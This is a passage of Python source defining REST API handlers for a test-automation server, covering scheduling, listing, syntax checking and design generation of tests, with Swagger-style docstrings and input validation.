            elif testExtension == 'tux':
                doc = TestUnit.DataModel()
                res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                        prjID, testPath, testExtension))
                if not res:
                    raise HTTP_500('Unable to read test unit: %s' % testPath)

                testData = {'test-definition': doc.testdef,
                            'test-execution': '',
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
                testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
                                 'test-name': testName,
                                 'test-path': testPath, 'test-data': testData})

            elif testExtension == 'tpx':
                doc = TestPlan.DataModel()
                res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                        prjID, testPath, testExtension))
                if not res:
                    raise HTTP_500('Unable to read test plan: %s' % testPath)

                # BUGFIX: use a dedicated local variable here; the previous
                # code rebound `tests` — the very list this loop is iterating —
                # which corrupted the processing of the remaining group entries.
                tp_tests = doc.getSorted()
                success, error_msg = RepoTests.instance().addtf2tp(data_=tp_tests)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test plan: %s' %
                        error_msg)

                testData = {'test-execution': doc.getSorted(),
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
                testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
                                 'test-name': testName,
                                 'test-path': testPath, 'test-data': testData})

            elif testExtension == 'tgx':
                doc = TestPlan.DataModel()
                res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                        prjID, testPath, testExtension))
                if not res:
                    raise HTTP_500('Unable to read test global: %s' % testPath)

                alltests = doc.getSorted()
                success, error_msg, alltests = RepoTests.instance().addtf2tg(data_=alltests)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test global: %s' %
                        error_msg)

                testData = {'test-execution': alltests,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
                testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
                                 'test-name': testName,
                                 'test-path': testPath, 'test-data': testData})

            else:
                raise HTTP_500(
                    'test extension not supported: %s' %
                    testExtension)

        # hand the whole prepared group over to the task manager
        if len(testsRun):
            success = TaskManager.instance().addTasks(userName=user_profile['login'],
                                                      tests=testsRun,
                                                      runAt=postponeAt,
                                                      queueAt=postponeMode,
                                                      simultaneous=parallel)
            if not success:
                raise HTTP_500('Unable to run the group of tests')
        else:
            raise HTTP_500('No tests provided')

        return {"cmd": self.request.path, "message": "success"}
class TestsSchedule(HandlerCORS):
    """
    /rest/tests/schedule
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Schedule a test unit/suite
        description: ''
        operationId: testsSchedule
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, test-extension, test-path, test-name]
              properties:
                project-id:
                  type: integer
                test-definition:
                  type: string
                test-execution:
                  type: string
                test-properties:
                  type: object
                test-extension:
                  type: string
                test-path:
                  type: string
                test-name:
                  type: string
                schedule-id:
                  type: integer
                  description: '0 => now, 1 => at, 2 => in'
                schedule-at:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                schedule-repeat:
                  type: integer
                probes-enabled:
                  type: boolean
                debug-enabled:
                  type: boolean
                notifications-enabled:
                  type: boolean
                logs-enabled:
                  type: boolean
                from-time:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                to-time:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                tab-id:
                  type: integer
                step-mode:
                  type: boolean
                breakpoint-mode:
                  type: boolean
                background-mode:
                  type: boolean
                test-inputs:
                  type: array
                  description: Test inputs parameters can be used to overwrite the original test parameters
                  items:
                    type: object
                    required: [ name, value, type ]
                    properties:
                      name:
                        type: string
                      type:
                        type: string
                      value:
                        type: string
        responses:
          '200':
            description: tests listing
            schema :
              properties:
                cmd:
                  type: string
                test-id:
                  type: string
                task-id:
                  type: string
                tab-id:
                  type: string
                test-name:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/schedule",
                  "message": "",
                  "test-id": "",
                  "task-id": "",
                  "tab-id": "",
                  "test-name": ""
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # extract the payload: mandatory fields raise, optional ones default
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            testDefinition = self.request.data.get("test-definition")
            if testDefinition is None:
                testDefinition = ""

            testExecution = self.request.data.get("test-execution")
            if testExecution is None:
                testExecution = ""

            testProperties = self.request.data.get("test-properties")
            if testProperties is None:
                testProperties = {}

            testExtension = self.request.data.get("test-extension")
            if testExtension is None:
                raise EmptyValue("Please specify a test extension")

            testPath = self.request.data.get("test-path")
            if testPath is None:
                raise EmptyValue("Please specify a test path")

            testName = self.request.data.get("test-name")
            if testName is None:
                raise EmptyValue("Please specify a test name")

            scheduleId = self.request.data.get("schedule-id")
            if scheduleId is None:
                scheduleId = 0

            _scheduleAt = self.request.data.get("schedule-at")
            _scheduleRepeat = self.request.data.get("schedule-repeat", 0)
            _tabId = self.request.data.get("tab-id")
            _backgroundMode = self.request.data.get("background-mode")
            _stepMode = self.request.data.get("step-mode")
            _breakpointMode = self.request.data.get("breakpoint-mode")
            _probesEnabled = self.request.data.get("probes-enabled")
            _notificationsEnabled = self.request.data.get(
                "notifications-enabled")
            _logsEnabled = self.request.data.get("logs-enabled")
            _debugEnabled = self.request.data.get("debug-enabled")
            _fromTime = self.request.data.get("from-time")
            _toTime = self.request.data.get("to-time")
            _testInputs = self.request.data.get("test-inputs")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # checking input
        if not isinstance(projectId, int):
            raise HTTP_400("Bad project id provided in request, int expected")
        if not isinstance(scheduleId, int):
            raise HTTP_400("Bad schedule id provided in request, int expected")

        # test-inputs, when present, must be a list of {name, type, value} dicts
        if _testInputs is not None:
            if not isinstance(_testInputs, list):
                raise HTTP_400(
                    "Bad test inputs provided in request, list expected")
            for inp in _testInputs:
                if not isinstance(inp, dict):
                    raise HTTP_400(
                        "Bad test inputs provided in request, list of dict expected")
                if not ("name" in inp and "type" in inp and "value" in inp):
                    raise HTTP_400(
                        "Bad test format inputs provided in request")

        # find if the user is connected on the channel too
        channelId = False
        channel = Context.instance().getUser(user_profile["login"])
        if channel is not None:
            channelId = list(channel['address'])

        # run a test not save; change the project id to the default
        if projectId == 0:
            projectId = ProjectsManager.instance().getDefaultProjectForUser(
                user=user_profile['login'])

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # no test content provided: load it from the repository instead
        if not len(testDefinition) and not len(
                testExecution) and not len(testProperties):
            if testExtension == 'tsx':
                doc = TestSuite.DataModel()
                res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                           projectId,
                                                           testPath,
                                                           testName,
                                                           testExtension))
                if not res:
                    raise HTTP_500('Unable to read test suite: %s' % testPath)

                testData = {'test-definition': doc.testdef,
                            'test-execution': doc.testexec,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension
                            }

            elif testExtension == 'tux':
                doc = TestUnit.DataModel()
                res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                           projectId,
                                                           testPath,
                                                           testName,
                                                           testExtension))
                if not res:
                    raise HTTP_500('Unable to read test unit: %s' % testPath)

                testData = {'test-definition': doc.testdef,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}

            else:
                raise HTTP_403(
                    'Test extension not supported: %s' %
                    testExtension)

        # content provided inline by the client
        else:
            if testExtension == 'tsx':
                testData = {'test-definition': testDefinition,
                            'test-execution': testExecution,
                            'test-properties': testProperties,
                            'test-extension': testExtension}

            elif testExtension == 'tux':
                testData = {'test-definition': testDefinition,
                            'test-execution': '',
                            'test-properties': testProperties,
                            'test-extension': testExtension}

            else:
                raise HTTP_403(
                    'Test extension not supported - no content: %s' %
                    testExtension)

        # defaults for all optional scheduling knobs
        tabId = 0
        backgroundMode = True
        stepMode = False
        breakpointMode = False
        notificationsEnabled = False
        logsEnabled = True
        debugEnabled = False
        probesEnabled = False
        fromTime = (0, 0, 0, 0, 0, 0)
        toTime = (0, 0, 0, 0, 0, 0)
        message = "success"
        scheduleAt = (0, 0, 0, 0, 0, 0)

        # overwrite the defaults with whatever the client provided
        if _tabId is not None:
            tabId = _tabId
        if _backgroundMode is not None:
            backgroundMode = _backgroundMode
        if _stepMode is not None:
            stepMode = _stepMode
        if _breakpointMode is not None:
            breakpointMode = _breakpointMode
        if _notificationsEnabled is not None:
            notificationsEnabled = _notificationsEnabled
        if _logsEnabled is not None:
            logsEnabled = _logsEnabled
        if _debugEnabled is not None:
            debugEnabled = _debugEnabled
        if _probesEnabled is not None:
            probesEnabled = _probesEnabled
        if _fromTime is not None:
            fromTime = _fromTime
        if _toTime is not None:
            toTime = _toTime
        if _scheduleAt is not None:
            scheduleAt = _scheduleAt

        # personalize test description ?
        if _testInputs is not None:
            for newInp in _testInputs:
                if "scope" not in newInp:
                    newInp["scope"] = "local"
                for origInp in testData["test-properties"]['inputs-parameters']['parameter']:
                    if "scope" not in origInp:
                        origInp["scope"] = "local"
                    # if the param exist on the original test than overwrite
                    # them
                    if newInp["name"] == origInp["name"]:
                        origInp["value"] = newInp["value"]
                        origInp["type"] = newInp["type"]
                        origInp["scope"] = newInp["scope"]

        # build the full test path unless the path already ends with the name
        if not testPath.endswith(testName):
            if len(testPath):
                _testPath = "%s/%s" % (testPath, testName)
            else:
                _testPath = testName
            _testPath = os.path.normpath(_testPath)
        else:
            _testPath = testPath

        # register the task with the scheduler
        task = TaskManager.instance().registerTask(
            testData=testData,
            testName=testName,
            testPath=_testPath,
            testUserId=user_profile['id'],
            testUser=user_profile['login'],
            testId=tabId,
            testBackground=backgroundMode,
            runAt=scheduleAt,
            runType=scheduleId,
            runNb=_scheduleRepeat,
            withoutProbes=probesEnabled,
            debugActivated=debugEnabled,
            withoutNotif=notificationsEnabled,
            noKeepTr=not logsEnabled,
            testProjectId=projectId,
            runFrom=fromTime,
            runTo=toTime,
            stepByStep=stepMode,
            breakpoint=breakpointMode,
            channelId=channelId
        )

        # NOTE(review): message style differs from TestsScheduleTpg
        # ("Unable to run the test: %s") — kept as-is for compatibility
        if task.lastError is not None:
            raise HTTP_500('ERROR: %s' % task.lastError)

        # describe how the task was actually queued
        if task.isRecursive():
            message = "recursive"
        if task.isRecursive() and backgroundMode:
            message = "recursive-background"
        if task.isPostponed():
            message = "postponed"
        if task.isPostponed() and backgroundMode:
            message = "postponed-background"
        if task.isSuccessive():
            message = "successive"
        if task.isSuccessive() and backgroundMode:
            message = "successive-background"
        if not task.isSuccessive() and not task.isPostponed(
        ) and not task.isRecursive() and backgroundMode:
            message = "background"

        return {"cmd": self.request.path,
                "message": message,
                "task-id": task.getId(),
                "test-id": task.getTestID(),
                "tab-id": tabId,
                "test-name": testName
                }
class TestsScheduleTpg(HandlerCORS):
    """
    /rest/tests/schedule/tpg
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Schedule a testplan or test global
        description: ''
        operationId: testsScheduleTpg
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, test-extension, test-path, test-name]
              properties:
                project-id:
                  type: integer
                test-execution:
                  type: string
                test-properties:
                  type: object
                test-extension:
                  type: string
                test-path:
                  type: string
                test-name:
                  type: string
                schedule-id:
                  type: integer
                  description: '0 => now, 1 => at, 2 => in'
                schedule-at:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                schedule-repeat:
                  type: integer
                probes-enabled:
                  type: boolean
                debug-enabled:
                  type: boolean
                notifications-enabled:
                  type: boolean
                logs-enabled:
                  type: boolean
                from-time:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                to-time:
                  type: array
                  description: '[ Y,M,D,H,M,S ]'
                  items:
                    type: integer
                tab-id:
                  type: integer
                step-mode:
                  type: boolean
                breakpoint-mode:
                  type: boolean
                background-mode:
                  type: boolean
                test-inputs:
                  type: array
                  description: Test inputs parameters can be used to overwrite the original test parameters
                  items:
                    type: object
                    required: [ name, value, type ]
                    properties:
                      name:
                        type: string
                      type:
                        type: string
                      value:
                        type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                test-id:
                  type: string
                task-id:
                  type: string
                tab-id:
                  type: string
                test-name:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/schedule/tpg"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # Resolve the calling user from the request/session context.
        user_profile = _get_user(request=self.request)
        # Extract the payload: mandatory fields raise EmptyValue (mapped to a
        # 400), optional fields fall back to defaults further below.
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            testExecution = self.request.data.get("test-execution")
            if testExecution is None:
                testExecution = ""
            testProperties = self.request.data.get("test-properties")
            if testProperties is None:
                testProperties = {}
            testExtension = self.request.data.get("test-extension")
            if testExtension is None:
                raise EmptyValue("Please specify a test extension")
            testPath = self.request.data.get("test-path")
            if testPath is None:
                raise EmptyValue("Please specify a test path")
            testName = self.request.data.get("test-name")
            if testName is None:
                raise EmptyValue("Please specify a test name")
            scheduleId = self.request.data.get("schedule-id")
            if scheduleId is None:
                scheduleId = 0
            # optional scheduling knobs; `_`-prefixed raw values are merged
            # onto the defaults later
            _scheduleAt = self.request.data.get("schedule-at")
            _scheduleRepeat = self.request.data.get("schedule-repeat", 0)
            _tabId = self.request.data.get("tab-id")
            _backgroundMode = self.request.data.get("background-mode")
            _stepMode = self.request.data.get("step-mode")
            _breakpointMode = self.request.data.get("breakpoint-mode")
            _probesEnabled = self.request.data.get("probes-enabled")
            _notificationsEnabled = self.request.data.get(
                "notifications-enabled")
            _logsEnabled = self.request.data.get("logs-enabled")
            _debugEnabled = self.request.data.get("debug-enabled")
            _fromTime = self.request.data.get("from-time")
            _toTime = self.request.data.get("to-time")
            _testInputs = self.request.data.get("test-inputs")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)
        # checking input
        if not isinstance(projectId, int):
            raise HTTP_400("Bad project id provided in request, int expected")
        if not isinstance(scheduleId, int):
            raise HTTP_400("Bad schedule id provided in request, int expected")
        # test-inputs, when present, must be a list of {name, type, value} dicts
        if _testInputs is not None:
            if not isinstance(_testInputs, list):
                raise HTTP_400(
                    "Bad test inputs provided in request, list expected")
            for inp in _testInputs:
                if not isinstance(inp, dict):
                    raise HTTP_400(
                        "Bad test inputs provided in request, list of dict expected")
                if not ("name" in inp and "type" in inp and "value" in inp):
                    raise HTTP_400(
                        "Bad test format inputs provided in request")
        # find if the user is connected on the channel too
        channelId = False
        channel = Context.instance().getUser(user_profile["login"])
        if channel is not None:
            channelId = list(channel['address'])
        # run a test not save; change the project id to the default
        if projectId == 0:
            projectId = ProjectsManager.instance().getDefaultProjectForUser(
                user=user_profile['login'])
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        # no test content provided: load the plan/global from the repository
        if not len(testExecution) and not len(testProperties):
            if testExtension == 'tpx':
                doc = TestPlan.DataModel()
                res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                           projectId,
                                                           testPath,
                                                           testName,
                                                           testExtension))
                if not res:
                    raise HTTP_500('Unable to read test plan: %s' % testPath)
                tests = doc.getSorted()
                # addtf2tp presumably resolves/injects the referenced test
                # files into `tests` in place — TODO confirm
                success, error_msg = RepoTests.instance().addtf2tp(data_=tests)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test plan: %s' %
                        error_msg)
                testData = {'test-execution': tests,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
            elif testExtension == 'tgx':
                doc = TestPlan.DataModel()
                res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
                                                           projectId,
                                                           testPath,
                                                           testName,
                                                           testExtension))
                if not res:
                    raise HTTP_500('Unable to read test global: %s' % testPath)
                alltests = doc.getSorted()
                # addtf2tg returns a rewritten test list (third value), unlike
                # addtf2tp which mutates its argument
                success, error_msg, alltests = RepoTests.instance().addtf2tg(data_=alltests)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test global: %s' %
                        error_msg)
                testData = {'test-execution': alltests,
                            'test-properties': doc.properties['properties'],
                            'test-extension': testExtension}
            else:
                raise HTTP_403(
                    'Test extension not supported: %s' %
                    testExtension)
        # content provided inline by the client
        else:
            if testExtension == 'tpx':
                success, error_msg = RepoTests.instance().addtf2tp(data_=testExecution)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test plan: %s' %
                        error_msg)
                testData = {'test-definition': '',
                            'test-execution': testExecution,
                            'test-properties': testProperties,
                            'test-extension': testExtension}
            elif testExtension == 'tgx':
                success, error_msg, testExecution = RepoTests.instance().addtf2tg(data_=testExecution)
                if success != Context.instance().CODE_OK:
                    raise HTTP_500(
                        'Unable to prepare test global: %s' %
                        error_msg)
                testData = {'test-definition': '',
                            'test-execution': testExecution,
                            'test-properties': testProperties,
                            'test-extension': testExtension}
            else:
                raise HTTP_403(
                    'Test extension not supported - no content: %s' %
                    testExtension)
        # defaults for all optional scheduling knobs
        tabId = 0
        backgroundMode = True
        stepMode = False
        breakpointMode = False
        notificationsEnabled = False
        logsEnabled = True
        debugEnabled = False
        probesEnabled = False
        fromTime = (0, 0, 0, 0, 0, 0)
        toTime = (0, 0, 0, 0, 0, 0)
        scheduleAt = (0, 0, 0, 0, 0, 0)
        message = "success"
        # overwrite the defaults with whatever the client provided
        if _tabId is not None:
            tabId = _tabId
        if _backgroundMode is not None:
            backgroundMode = _backgroundMode
        if _stepMode is not None:
            stepMode = _stepMode
        if _breakpointMode is not None:
            breakpointMode = _breakpointMode
        if _notificationsEnabled is not None:
            notificationsEnabled = _notificationsEnabled
        if _logsEnabled is not None:
            logsEnabled = _logsEnabled
        if _debugEnabled is not None:
            debugEnabled = _debugEnabled
        if _probesEnabled is not None:
            probesEnabled = _probesEnabled
        if _fromTime is not None:
            fromTime = _fromTime
        if _toTime is not None:
            toTime = _toTime
        if _scheduleAt is not None:
            scheduleAt = _scheduleAt
        # personalize test description ?
        if _testInputs is not None:
            for newInp in _testInputs:
                for origInp in testData["test-properties"]['inputs-parameters']['parameter']:
                    # if the param exist on the original test than overwrite
                    # them
                    if newInp["name"] == origInp["name"]:
                        origInp["value"] = newInp["value"]
                        origInp["type"] = newInp["type"]
                        if "scope" in newInp:  # condition for backward compatibility
                            origInp["scope"] = newInp["scope"]
                        else:
                            origInp["scope"] = "local"
        # build the full test path unless the path already ends with the name
        if not testPath.endswith(testName):
            if len(testPath):
                _testPath = "%s/%s" % (testPath, testName)
            else:
                _testPath = testName
            _testPath = os.path.normpath(_testPath)
        else:
            _testPath = testPath
        # register the task with the scheduler
        task = TaskManager.instance().registerTask(
            testData=testData,
            testName=testName,
            testPath=_testPath,
            testUserId=user_profile['id'],
            testUser=user_profile['login'],
            testId=tabId,
            testBackground=backgroundMode,
            runAt=scheduleAt,
            runType=scheduleId,
            runNb=_scheduleRepeat,
            withoutProbes=probesEnabled,
            debugActivated=debugEnabled,
            withoutNotif=notificationsEnabled,
            noKeepTr=not logsEnabled,
            testProjectId=projectId,
            runFrom=fromTime,
            runTo=toTime,
            stepByStep=stepMode,
            breakpoint=breakpointMode,
            channelId=channelId
        )
        if task.lastError is not None:
            raise HTTP_500('Unable to run the test: %s' % task.lastError)
        # describe how the task was actually queued
        if task.isRecursive():
            message = "recursive"
        if task.isRecursive() and backgroundMode:
            message = "recursive-background"
        if task.isPostponed():
            message = "postponed"
        if task.isPostponed() and backgroundMode:
            message = "postponed-background"
        if task.isSuccessive():
            message = "successive"
        if task.isSuccessive() and backgroundMode:
            message = "successive-background"
        if not task.isSuccessive() and not task.isPostponed(
        ) and not task.isRecursive() and backgroundMode:
            message = "background"
        return {"cmd": self.request.path,
                "message": message,
                "task-id": task.getId(),
                "test-id": task.getTestID(),
                "tab-id": tabId,
                "test-name": testName
                }
class TestsListing(HandlerCORS):
    """
    /rest/tests/listing
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Get the listing of all tests.
        description: ''
        operationId: testsListing
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                project-id:
                  type: integer
                for-saveas:
                  type: boolean
                for-runs:
                  type: boolean
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: array
                  items:
                    type: string
                project-id:
                  type: integer
            examples:
              application/json: |
                {
                  "cmd": "/tests/listing",
                  "listing": [],
                  "project-id": 1
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # Resolve the calling user from the request/session context.
        user_profile = _get_user(request=self.request)

        # Extract the payload; a payload that does not behave like a dict is
        # a client error, as is a missing project id.
        try:
            project_id = self.request.data.get("project-id")
            saveas_flag = self.request.data.get("for-saveas", False)
            runs_flag = self.request.data.get("for-runs", False)
        except Exception as err:
            raise HTTP_400("Bad request provided (%s ?)" % err)
        if project_id is None:
            raise HTTP_400("Please specify a project id")

        # Reject users without access to this project.
        _check_project_permissions(user_login=user_profile['login'],
                                   project_id=project_id)

        # Only the listing part of the repository tree is returned; the two
        # flags are simply echoed back for the client.
        _, _, listing, _ = RepoTests.instance().getTree(project=project_id)
        return {"cmd": self.request.path,
                "listing": listing,
                "project-id": project_id,
                "for-saveas": saveas_flag,
                "for-runs": runs_flag}
class TestsCheckSyntax(HandlerCORS):
    """
    /rest/tests/check/syntax
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: check the syntax of a test (unit, abstract and suite)
        description: ''
        operationId: testsCheckSyntax
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ test-definition, test-execution, test-properties, test-name, test-path, test-extension ]
              properties:
                test-definition:
                  type: string
                test-execution:
                  type: string
                test-properties:
                  type: string
                test-name:
                  type: string
                test-path:
                  type: string
                test-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                status:
                  type: boolean
                error-msg:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/check/syntax/string",
                  "status": True,
                  "error-msg": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # Resolve the calling user from the request/session context.
        user_profile = _get_user(request=self.request)

        # All fields are mandatory; collect them table-driven so each missing
        # field yields its dedicated error message.
        required = (("test-definition", "Please specify a test definition"),
                    ("test-execution", "Please specify a test execution"),
                    ("test-properties", "Please specify a test properties"),
                    ("test-name", "Please specify a test name"),
                    ("test-path", "Please specify a test path"),
                    ("test-extension", "Please specify a test extension"))
        fields = {}
        try:
            for key, missing_msg in required:
                fields[key] = self.request.data.get(key)
                if fields[key] is None:
                    raise EmptyValue(missing_msg)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # Only abstract/unit/suite tests are handled by this endpoint.
        if fields["test-extension"] not in ["tax", "tux", "tsx"]:
            raise HTTP_400("Bad test extension provided (%s)" %
                           fields["test-extension"])

        # Build a transient task object just to parse the test content.
        task = TaskManager.getObjectTask(
            testData=self.request.data,
            testName=fields["test-name"],
            testPath=fields["test-path"],
            testUser=user_profile["login"],
            testId=0,
            testBackground=False,
            context=Context
        )
        status, error_msg = task.parseTest()
        del task

        return {"cmd": self.request.path, "status": status, "error": error_msg}
class TestsCheckSyntaxTpg(HandlerCORS):
    """
    /rest/tests/check/syntax/tpg
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: check the syntax of a test (plan and global)
        description: ''
        operationId: testsCheckSyntaxTpg
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ test-execution, test-properties, test-name, test-path, test-extension ]
              properties:
                test-execution:
                  type: array
                  items:
                    type: string
                test-properties:
                  type: string
                test-name:
                  type: string
                test-path:
                  type: string
                test-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                status:
                  type: boolean
                error-msg:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/check/syntax/tpg",
                  "status": True,
                  "error-msg": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # Resolve the calling user from the request/session context.
        user_profile = _get_user(request=self.request)

        # All fields are mandatory; collect them table-driven so each missing
        # field yields its dedicated error message.
        required = (("test-execution", "Please specify a test execution"),
                    ("test-properties", "Please specify a test properties"),
                    ("test-name", "Please specify a test name"),
                    ("test-path", "Please specify a test path"),
                    ("test-extension", "Please specify a test extension"))
        fields = {}
        try:
            for key, missing_msg in required:
                fields[key] = self.request.data.get(key)
                if fields[key] is None:
                    raise EmptyValue(missing_msg)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        extension = fields["test-extension"]
        execution = fields["test-execution"]

        # Only plan/global tests are handled by this endpoint.
        if extension not in ["tgx", "tpx"]:
            raise HTTP_400("Bad test extension provided (%s)" % extension)

        # Resolve the test files referenced by the plan/global before parsing;
        # addtf2tg returns a rewritten list, addtf2tp prepares in place.
        if extension == "tgx":
            success, error_msg, prepared = RepoTests.instance().addtf2tg(data_=execution)
            if success != Context.instance().CODE_OK:
                return {"cmd": self.request.path,
                        "status": False, "error": error_msg}
        else:  # tpx (already validated above)
            success, error_msg = RepoTests.instance().addtf2tp(data_=execution)
            if success != Context.instance().CODE_OK:
                return {"cmd": self.request.path,
                        "status": False, "error": error_msg}
            prepared = execution

        testData = {'test-definition': '',
                    'test-execution': prepared,
                    'test-properties': fields["test-properties"],
                    'test-extension': extension}

        # Build a transient task object just to parse the test content.
        task = TaskManager.getObjectTask(
            testData=testData,
            testName=fields["test-name"],
            testPath=fields["test-path"],
            testUser=user_profile["login"],
            testId=0,
            testBackground=False,
            context=Context
        )
        status, error_msg = task.parseTest()
        del task

        return {"cmd": self.request.path, "status": status, "error": error_msg}
class TestsCreateDesign(HandlerCORS):
    """
    /rest/tests/create/design
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: create the design of a test (unit, abstract and suite)
        description: ''
        operationId: testsCreateDesign
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, test-definition, test-execution, test-properties, test-name, test-path, test-extension ]
              properties:
                project-id:
                  type: integer
                test-definition:
                  type: string
                test-execution:
                  type: string
                test-properties:
                  type: string
                test-name:
                  type: string
                test-path:
                  type: string
                test-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                status:
                  type: boolean
                error-msg:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/check/design",
                  "status": True,
                  "error-msg": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        # Resolve the calling user from the request/session context.
        user_profile = _get_user(request=self.request)

        # All fields are mandatory; collect them table-driven so each missing
        # field yields its dedicated error message.
        required = (("project-id", "Please specify a project id"),
                    ("test-definition", "Please specify a test definition"),
                    ("test-execution", "Please specify a test execution"),
                    ("test-properties", "Please specify a test properties"),
                    ("test-name", "Please specify a test name"),
                    ("test-path", "Please specify a test path"),
                    ("test-extension", "Please specify a test extension"))
        fields = {}
        try:
            for key, missing_msg in required:
                fields[key] = self.request.data.get(key)
                if fields[key] is None:
                    raise EmptyValue(missing_msg)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # Only abstract/unit/suite tests are handled by this endpoint.
        if fields["test-extension"] not in ["tax", "tux", "tsx"]:
            raise HTTP_400("Bad test extension provided (%s)" %
                           fields["test-extension"])

        # Build a transient task object just to generate the test design.
        task = TaskManager.getObjectTask(
            testData=self.request.data,
            testName=fields["test-name"],
            testPath=fields["test-path"],
            testUser=user_profile["login"],
            testId=0,
            testBackground=False,
            projectId=fields["project-id"],
            context=Context
        )
        parsed = task.parseTestDesign()
        del task

        return {"cmd": self.request.path,
                "error": parsed["error"],
                "error-msg": parsed["error-details"],
                "design": parsed["design"],
                "xml-design": parsed["design-xml"],
                }
